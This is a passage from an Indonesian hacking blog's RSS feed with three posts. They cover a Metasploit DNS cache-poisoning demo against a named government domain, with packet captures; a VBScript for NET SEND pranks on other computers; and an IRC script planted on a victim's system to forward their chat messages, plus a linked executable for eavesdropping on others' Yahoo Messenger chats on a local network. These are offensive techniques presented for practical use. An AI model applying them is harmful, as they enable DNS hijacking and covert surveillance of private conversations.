depkominfo.go.id. 41164 IN NS 192.168.2.105.  ;; Query time: 37 msec ;; SERVER: 192.168.2.102#53 (192.168.2.102) ;; WHEN: Sun Aug  3 18:49:22 2008 ;; MSG SIZE  rcvd: 61   &lt;/pre&gt;&lt;div style="text-align: justify;"&gt;Pada demo diatas, kita melakukan cache poisoning terhadap DNS server 192.168.2.102 untuk domain depkominfo.go.id, hasil akhirnya seluruh query domain depkominfo.go.id akan diarahkan pada DNS server 192.168.2.105. Seluruh client yang menunjuk 192.168.2.102 juga akan mendapatkan hasil yang sama. Metasploit menggunakan opendns untuk proses RECONS authoritative DNS server domain depkominfo.go.id, hal ini dilakukan untuk mencegah data tersebut masuk cache DNS server target jika dilakukan query secara langsung (asumsi kita belum tau nameserver untuk domain depkominfo.go.id). FYI, kita tidak hanya dapat menggunakan opendns, namun juga bisa menggunakan open DNS server yang lain. Phoenix dari k-elektronik pernah membuat tools untuk mencari open DNS server ini pada internet.  Setelah mendapatkan informasi authoritative nameserver, metasploit akan menghitung berapa jumlah response terhadap setiap query yang dikirimkan, dengan ini diharapkan proses bruteforce QID akan lebih efisien. Berikut ini hasil capture paket-paket data yang sampai di DNS target, dan akan memperlihatkan implementasi dari 'asumsi' yang dilontarkan oleh halvar flake saat membuka rahasia hole DNS Dan Kaminsky:  Internet Protocol, Src: 192.168.2.105 (192.168.2.105), Dst: 192.168.2.102 (192.168.2.102) User Datagram Protocol, Src Port: 47498 (47498), Dst Port: domain (53) Domain Name System (query)    [Response In: 276016]    Transaction ID: 0xffd4    Flags: 0x0100 (Standard query)        0... .... .... .... = Response: Message is a query        .000 0... .... .... = Opcode: Standard query (0)        .... ..0. .... .... = Truncated: Message is not truncated        .... ...1 .... .... = Recursion desired: Do query recursively        .... .... .0.. .... = Z: reserved (0)        .... .... ...0 .... = Non-authenticated data OK: Non-authenticated data is unacceptable    Questions: 1    Answer RRs: 0    Authority RRs: 0    Additional RRs: 0    Queries        VmlcscEEItDB9.depkominfo.go.id: type A, class IN            Name: VmlcscEEItDB9.depkominfo.go.id            Type: A (Host address)            Class: IN (0x0001)  Internet Protocol, Src: 192.168.2.102 (192.168.2.102), Dst: 222.124.199.71 (222.124.199.71) User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53) Domain Name System (query)    [Response In: 276013]    Transaction ID: 0x2e16    Flags: 0x0010 (Standard query)        0... .... .... .... = Response: Message is a query        .000 0... .... .... = Opcode: Standard query (0)        .... ..0. .... .... = Truncated: Message is not truncated        .... ...0 .... .... = Recursion desired: Don't do query recursively        .... .... .0.. .... = Z: reserved (0)        .... .... ...1 .... = Non-authenticated data OK: Non-authenticated data is acceptable    Questions: 1    Answer RRs: 0    Authority RRs: 0    Additional RRs: 1    Queries        VmlcscEEItDB9.depkominfo.go.id: type A, class IN            Name: VmlcscEEItDB9.depkominfo.go.id            Type: A (Host address)            Class: IN (0x0001)    Additional records        &lt;root&gt;: type OPT&lt;/root&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;root&gt;          Name: &lt;root&gt;&lt;/root&gt;&lt;/root&gt;&lt;br /&gt;&lt;/div&gt;&lt;root&gt;&lt;root&gt;&lt;/root&gt;&lt;/root&gt;&lt;/div&gt;&lt;pre&gt;&lt;root&gt;&lt;root&gt;          Type: OPT (EDNS0 option)&lt;br /&gt;        UDP payload size: 4096&lt;br /&gt;        Higher bits in extended RCODE: 0x0&lt;br /&gt;        EDNS0 version: 0&lt;br /&gt;        Z: 0x8000&lt;br /&gt;            Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)&lt;br /&gt;            Bits 1-15: 0x0 (reserved)&lt;br /&gt;        Data length: 0&lt;br /&gt;&lt;br /&gt;Internet Protocol, Src: 222.124.199.71 (222.124.199.71), Dst: 192.168.2.102 (192.168.2.102)&lt;br /&gt;User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53)&lt;br /&gt;Domain Name System (response)&lt;br /&gt;Transaction ID: 0x7eed&lt;br /&gt;Flags: 0x8500 (Standard query response, No error)&lt;br /&gt;    1... .... .... .... = Response: Message is a response&lt;br /&gt;    .000 0... .... .... = Opcode: Standard query (0)&lt;br /&gt;    .... .1.. .... .... = Authoritative: Server is an authority for domain&lt;br /&gt;    .... ..0. .... .... = Truncated: Message is not truncated&lt;br /&gt;    .... ...1 .... .... = Recursion desired: Do query recursively&lt;br /&gt;    .... .... 0... .... = Recursion available: Server can't do recursive queries&lt;br /&gt;    .... .... .0.. .... = Z: reserved (0)&lt;br /&gt;    .... .... ..0. .... = Answer authenticated: Answer/authority portion was not authenticated by the server&lt;br /&gt;    .... .... .... 0000 = Reply code: No error (0)&lt;br /&gt;Questions: 1&lt;br /&gt;Answer RRs: 1&lt;br /&gt;Authority RRs: 1&lt;br /&gt;Additional RRs: 1&lt;br /&gt;Queries&lt;br /&gt;    VmlcscEEItDB9.depkominfo.go.id: type A, class IN&lt;br /&gt;        Name: VmlcscEEItDB9.depkominfo.go.id&lt;br /&gt;        Type: A (Host address)&lt;br /&gt;        Class: IN (0x0001)&lt;br /&gt;Answers&lt;br /&gt;    VmlcscEEItDB9.depkominfo.go.id: type A, class IN, addr 135.177.94.73&lt;br /&gt;        Name: VmlcscEEItDB9.depkominfo.go.id&lt;br /&gt;        Type: A (Host address)&lt;br /&gt;        Class: IN (0x0001)&lt;br /&gt;        Time to live: 12 hours, 28 minutes, 30 seconds&lt;br /&gt;        Data length: 4&lt;br /&gt;        Addr: 135.177.94.73&lt;br /&gt;Authoritative nameservers&lt;br /&gt;    depkominfo.go.id: type NS, class IN, ns 192.168.2.105&lt;br /&gt;        Name: depkominfo.go.id&lt;br /&gt;        Type: NS (Authoritative name server)&lt;br /&gt;        Class: IN (0x0001)&lt;br /&gt;        Time to live: 12 hours, 28 minutes, 30 seconds&lt;br /&gt;        Data length: 15&lt;br /&gt;        Name server: 192.168.2.105&lt;br /&gt;Additional records&lt;br /&gt;    192.168.2.105: type A, class IN, addr 135.177.94.73&lt;br /&gt;        Name: 192.168.2.105&lt;br /&gt;        Type: A (Host address)&lt;br /&gt;        Class: IN (0x0001)&lt;br /&gt;        Time to live: 12 hours, 28 minutes, 30 seconds&lt;br /&gt;        Data length: 4&lt;br /&gt;        Addr: 135.177.94.73&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/root&gt;&lt;/root&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;Dari struktur diatas, kita dapat melihat attacker (192.168.2.105) mengirim&lt;/root&gt;&lt;/root&gt; &lt;root style="font-family: times new roman;"&gt;&lt;root&gt;query untuk VmlcscEEItDB9.depkominfo.go.id, kemudian resolver/dns server yang &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;dijadikan target (192.168.2.102) akan melakukan recursive dns query untuk &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;mencari authoritative dns server domain depkominfo.go.id serta menanyakan &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;jawaban untuk server VmlcscEEItDB9.depkominfo.go.id, saat resolver tersebut&lt;/root&gt;&lt;/root&gt; &lt;root style="font-family: times new roman;"&gt;&lt;root&gt;mencari jawaban dari authoritative dns server attacker mengirimkan flooding &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;response untuk pertanyaan tersebut. Dan jika QID response-nya sama dengan QID &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;query resolver maka cache resolver akan teracuni, dan dengan metasploit hal ini&lt;/root&gt;&lt;/root&gt;&lt;br /&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;paling tidak membutuhkan sekitar 3 menit. Konidisi race inilah yang menentukan&lt;/root&gt;&lt;/root&gt; &lt;root style="font-family: times new roman;"&gt;&lt;root&gt;apakah proses poisoning berhasil, jika response dari authoritative dns server &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;domain depkominfo.go.id lebih dulu datang maka response berisi NXDOMAIN &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;(non-existant domain) akan diberikan kepada resolver, dan resolver akan&lt;/root&gt;&lt;/root&gt; &lt;root style="font-family: times new roman;"&gt;&lt;root&gt;meneruskan kepada attacker. Seluruh flood yang tersisa untuk query tersebut &lt;/root&gt;&lt;/root&gt;&lt;root style="font-family: times new roman;"&gt;&lt;root&gt;akan di-discard oleh resolver.&lt;/root&gt;&lt;/root&gt;&lt;br /&gt;&lt;root&gt;&lt;root&gt;&lt;/root&gt;&lt;/root&gt;&lt;/div&gt;&lt;pre&gt;&lt;root&gt;&lt;root&gt;&lt;br /&gt;Selengkapnya baca di &lt;a href="http://www.ezine.echo.or.id/ezine19/e19.008.txt"&gt;http://www.ezine.echo.or.id/ezine19/e19.008.txt&lt;/a&gt;&lt;/root&gt;&lt;/root&gt;&lt;/pre&gt;</description><link>http://xpemula.blogspot.com/2008/08/bug-dns.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-5264467207358697993</guid><pubDate>Mon, 11 Aug 2008 06:14:00 +0000</pubDate><atom:updated>2009-03-12T20:02:38.022-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Jaringan</category><title>Ngisengin Orang</title><description>Kenapa Saya memberi judul pada tulisan kali ini”Ngisengin Orang”? Karena kali pertama saya menggunakan ini hanya untuk iseng pada sebuah room di sebuah warnet. &lt;p style="margin-bottom: 0in;"&gt;Kali ini saya ingin menyentuh tentang sebuah bahasa pemrograman yaitu VBS untuk mengirimkan pesan pada komputer lain yang berada dalam satu jaringan. Pada prinsipnya disini menggunakan Net Send, bedanya ada sedikit modifikasi dengan menggunakan VBScript.&lt;br /&gt;&lt;br /&gt;Berikut adalah script nya:&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Option Explicit&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Const MyApp = "Send Network Message, By: BlackSignal"&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Const Netsend = "%COMSPEC% /C %SystemRoot%\system32\NET.EXE SEND"&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Const WindowStyle = 0&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Const WaitOnReturn = False&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Dim sCommand, sSendto, sMessage&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Dim oSh&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;On Error Resume Next&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;If Not IsWinnt() Then&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Wscript.Echo "Script ini hanya berlaku untuk windows berbasis NT"&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Wscript.Quit(1)&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;End If&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;sSendto = InputBox("Masukkan nama komputer target atau IP Address atau gunakan karakter * untuk pengiriman massal", MyApp)&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;If sSendto = "" Then Wscript.Quit(1)&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;sCommand = Netsend &amp;amp; " " &amp;amp; sSendto&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;sMessage = InputBox("Ketikkan pesan Anda:", MyApp)&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;If sMessage = "" Then Wscript.Quit(1)&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;sCommand = sCommand &amp;amp; " " &amp;amp; sMessage&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Set oSh = CreateObject("Wscript.Shell")&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;oSh.Run sCommand, WindowStyle, WaitOnReturn&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Set oSh = Nothing&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Private Function IsWinnt()&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Const OSNT = "Windows_NT"&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Dim oSh&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Dim sOS&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;IsWinnt = False&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Set oSh=CreateObject("Wscript.Shell")&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;sOS = oSh.ExpandEnvironmentStrings("%OS%")&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;Set oSh = Nothing&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;If sOS = OSNT Then IsWinnt = True&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; font-style: italic;"&gt;End Function&lt;/p&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Script tersebut disimpan dalam ekstensi .vbs&lt;br /&gt;Cara kerja dari script ini adalah mengirimkan pesan ke komputer target dengan memasukkan alamat IP Address target atau dengan memasukkan karakter * untuk pengiriman massal.&lt;br /&gt;&lt;br /&gt;Tampilannya seperti gambar dibawah ini.&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaPKmbwpFV3oCIM4px8iNQKB1gU4nImo9MKUN3lkAiYdWN2Vmbtdp3CfHgn23O-boLcyfPlO4C3NhF-pTwJS7V6EcMILarODrqmXSDovXqfEZiLZ0Chofb3kRG6XlyppnsIOgM_7Yg_Z0/s1600-h/capture_11082008_130012.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaPKmbwpFV3oCIM4px8iNQKB1gU4nImo9MKUN3lkAiYdWN2Vmbtdp3CfHgn23O-boLcyfPlO4C3NhF-pTwJS7V6EcMILarODrqmXSDovXqfEZiLZ0Chofb3kRG6XlyppnsIOgM_7Yg_Z0/s320/capture_11082008_130012.jpg" alt="" id="BLOGGER_PHOTO_ID_5233140359659732866" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBGQ-E7rdGNy4MaFIWVZljo94gH-ZKWIy9RIfoEWToAdTZL3t2lFLaFDYc2mVFWo94sdumKd5zAs4Y_0QzG-IGvx8mcijSGFbg9wfYAknUTj8x8o4RAkui4y4ywtyBmXuZMbeZIARwS_w/s1600-h/capture_11082008_130024.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBGQ-E7rdGNy4MaFIWVZljo94gH-ZKWIy9RIfoEWToAdTZL3t2lFLaFDYc2mVFWo94sdumKd5zAs4Y_0QzG-IGvx8mcijSGFbg9wfYAknUTj8x8o4RAkui4y4ywtyBmXuZMbeZIARwS_w/s320/capture_11082008_130024.jpg" alt="" id="BLOGGER_PHOTO_ID_5233140448343770274" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoEq5AfktoPhgyGBNH7l6BkIpDGBQKEyOO6wAcSLFtv1mwR6oeFHnTxlbE79skkh65yHWD2CXfdnLWxqFPNBzerhpvPa6Vhrqs3IfvZxolvKtC31nrdnW-_Uc4vOdrsPFmGktHaN7CKfY/s1600-h/capture_11082008_130102.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoEq5AfktoPhgyGBNH7l6BkIpDGBQKEyOO6wAcSLFtv1mwR6oeFHnTxlbE79skkh65yHWD2CXfdnLWxqFPNBzerhpvPa6Vhrqs3IfvZxolvKtC31nrdnW-_Uc4vOdrsPFmGktHaN7CKfY/s320/capture_11082008_130102.jpg" alt="" id="BLOGGER_PHOTO_ID_5233140526498663426" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;Thanks to:&lt;/p&gt;&lt;p style="margin-bottom: 0in; font-weight: bold; font-style: italic;"&gt;Okki Navarone&lt;/p&gt;&lt;p style="margin-bottom: 0in; font-weight: bold; font-style: italic;"&gt;Efvy Zamidra Zam&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Lirva32&lt;/span&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;/div&gt;</description><link>http://xpemula.blogspot.com/2008/08/ngisengin-orang.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaPKmbwpFV3oCIM4px8iNQKB1gU4nImo9MKUN3lkAiYdWN2Vmbtdp3CfHgn23O-boLcyfPlO4C3NhF-pTwJS7V6EcMILarODrqmXSDovXqfEZiLZ0Chofb3kRG6XlyppnsIOgM_7Yg_Z0/s72-c/capture_11082008_130012.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-9025136699140725779</guid><pubDate>Tue, 22 Apr 2008 05:32:00 +0000</pubDate><atom:updated>2009-03-12T20:04:45.060-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Bermain-main dengan Yahoo Messenger</title><description>Seorang hacker biasanya cenderung memilih client yang ada di channel IRC sebagai korbannya, hal ini karena IRC lebih tidak teratur dan biasanya tidak dimoderasi. Keadaan ini akan lebih memudahkan hacker untuk menyerang korbannya.&lt;br /&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;Seorang hacker bisa memonitor apa yang ditulis oleh korbannya dan dengan siapa saja dia melakukan komunikasi di IRC. Untuk melakukan hal itu, hacker hanya perlu menyusupkan script ke system korban.&lt;/div&gt;&lt;p style="text-align: justify;" align="center"&gt;&lt;textarea style="width: 483px; height: 54px;" name="textarea" rows="3" cols="57"&gt;on 1:INPUT:*:{msg [#nama channel] $active $+ : $1- write c:\windoes\system\[nama file] &lt;$+ $nick $+ $ip $+&gt; $active $+ : 1-}&lt;/textarea&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;Fungsi script diatas adalah untuk mengirimkan pesan ke channel yang sudah ditentukan. Script ini pernah hits di awal tahun 2003an.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5191958066005898626" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyQGgP6uxbHYbfmmUiGgoYrzLin0EUek_RwZIADfwSsPIiYfRrEL3Vc5AItcHvPGIIaCtbOXF3fWvn1EFpjyOwAkiwyLVCr0ZlWVGmenwQbk0bpt4iGbBwKTvCjYp2GWrD76DDFIF-MaM/s320/yahoockeker.jpg" border="0" /&gt;&lt;div style="text-align: justify;"&gt;Namun sekarang IRC sudah banyak ditinggalkan orang dan lebih memilih Instan messeging seperti Yahoo messenger dan sejenisnya yang dianggap lebih langsung, friendsly dan aman. Hal itu ditunjukkan oleh Yahoo Messenger yang apabila akan masuk ke salah satu channel, kita harus melalui sebuah filter berupa captcha.&lt;br /&gt;Namun demikian, YM sebenarnya masih tetap bisa dimonitor walaupun untuk melakukan hal ini, kita membutuhkan tool dari pihak ketiga. Saya Sendiri biasa menggunakan YahooChecker.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Untuk mendapatkan tool nya, silahkan sedot di:&lt;br /&gt;http://rapidshare.com/files/109330688/yahoochecker.exe&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Kita asumsikan anda telah mendownload dan menginstal yahoockecker.exe. kemudian jalankan programnya. Screenshoot nya seperti gambar di bawah ini.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAKtmsh2Zkf8Wv4Om14EBDNp3UuKzRWARnBilCNZP8l7aQ9F4A94SBXKuxL5MfoZ0UywJxIlIWHJFI81KOHvCb8aEa9nNDF62bzmW-Do299jO4zjbrEXbmpgyHs4f-ghNH8yZn9Tn7sZM/s1600-h/iviewcapture_date_22_04_2008_time_12_26_15.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5191940443755083026" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAKtmsh2Zkf8Wv4Om14EBDNp3UuKzRWARnBilCNZP8l7aQ9F4A94SBXKuxL5MfoZ0UywJxIlIWHJFI81KOHvCb8aEa9nNDF62bzmW-Do299jO4zjbrEXbmpgyHs4f-ghNH8yZn9Tn7sZM/s320/iviewcapture_date_22_04_2008_time_12_26_15.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Setelah itu kita lakukan konfigurasi.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYfn0x370mKv-FSbZ7tiZhOKO3QfJYPrdd6HMMKNeywlsCVHl5dFLTIUrwllU2OMd1cF2B9g7AvZLHi5_Oh2L8tioMI4Tfs4jDT4KXfiBvHAJVs6t07ILX6jJu1thh9h33cQXwtpYBods/s1600-h/iviewcapture_date_22_04_2008_time_12_26_15+copy.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5191940941971289378" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYfn0x370mKv-FSbZ7tiZhOKO3QfJYPrdd6HMMKNeywlsCVHl5dFLTIUrwllU2OMd1cF2B9g7AvZLHi5_Oh2L8tioMI4Tfs4jDT4KXfiBvHAJVs6t07ILX6jJu1thh9h33cQXwtpYBods/s320/iviewcapture_date_22_04_2008_time_12_26_15+copy.jpg" border="0" /&gt;&lt;/a&gt; 1. Tentukan Adapter&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4qkmDYFg-zXG4XlKw9KwmeGbN2fUOIBEHQZcbxCLBQpWOEpVTEzpxqCS7QK9cGQJ16WWoFj572BXC5DxdCx1qmfxJnM4LpMtSu7oB1wJjjFJBxp-Qn6-n5pZazVU_a1zrPViljG2Dc4/s1600-h/iviewcapture_date_22_04_2008_time_12_26_24.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5191941285568673090" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4qkmDYFg-zXG4XlKw9KwmeGbN2fUOIBEHQZcbxCLBQpWOEpVTEzpxqCS7QK9cGQJ16WWoFj572BXC5DxdCx1qmfxJnM4LpMtSu7oB1wJjjFJBxp-Qn6-n5pZazVU_a1zrPViljG2Dc4/s320/iviewcapture_date_22_04_2008_time_12_26_24.jpg" border="0" /&gt;&lt;/a&gt; 2. Scanning terhadap ip address jaringan lokal&lt;br /&gt;&lt;br /&gt;Pilih salah satu IP yang akan kita monitor&lt;br /&gt;&lt;div style="text-align: justify;" align="center"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk2QYUkm_cSKfjQmavmJZbLnf8-2ffY5scAFd1iTd2aTtG3OkO_iWbXlXAeGMWPgOvWnNfVcZsep918-cljk9ZWnG2ztsEmXKl0bZxj1rPJNPxsfq7GFe0gej8rBW7rSWsJintwnEDJEg/s1600-h/iviewcapture_date_22_04_2008_time_12_26_38.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk2QYUkm_cSKfjQmavmJZbLnf8-2ffY5scAFd1iTd2aTtG3OkO_iWbXlXAeGMWPgOvWnNfVcZsep918-cljk9ZWnG2ztsEmXKl0bZxj1rPJNPxsfq7GFe0gej8rBW7rSWsJintwnEDJEg/s320/iviewcapture_date_22_04_2008_time_12_26_38.jpg" alt="" id="BLOGGER_PHOTO_ID_5207529818939380674" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;3. Klik START untuk memulai monitoring&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Jika room yang kita monitor ternyata sedang online dan melakukan komunikasi di YM, hasilnya akan tampak seperti gambar dibawah ini. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiniDPUJtgB_nejkp6UNC8RASDRo1J-QECOe_r7R4UftF37EC7DMpVaF_H23rpPe8GBTSIgKQk9aTUsciy73edDkkte5G4UhnKKLGGO08yRZ7zXiJREdw88iNtCKCbJS8LEt1p6HwsiaKU/s1600-h/iviewcapture_date_18_04_2008_time_16_31_38.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiniDPUJtgB_nejkp6UNC8RASDRo1J-QECOe_r7R4UftF37EC7DMpVaF_H23rpPe8GBTSIgKQk9aTUsciy73edDkkte5G4UhnKKLGGO08yRZ7zXiJREdw88iNtCKCbJS8LEt1p6HwsiaKU/s320/iviewcapture_date_18_04_2008_time_16_31_38.jpg" alt="" id="BLOGGER_PHOTO_ID_5207530407349900242" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvRIGReb2jK2wBg98eTeR46YH5isS_0VuSPKs_no8A329vyKetD1gRiGl44W8_vlvj4_VaWvXO1r1gMpTwn6IyZNDDAEAqmyYC9zQyBvnxu2iLK7P_09LMDg1FpEyZBZlZzzAIf0SKuAI/s1600-h/iviewcapture_date_18_04_2008_time_16_31_38.jpg"&gt;&lt;/a&gt;Ingat,,,ngintip merupakan pekerjaan yang kurang baik...bisa berakibat timbilan..!! &lt;/div&gt;</description><link>http://xpemula.blogspot.com/2008/04/bermain-main-dengan-yahoo-messenger.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" 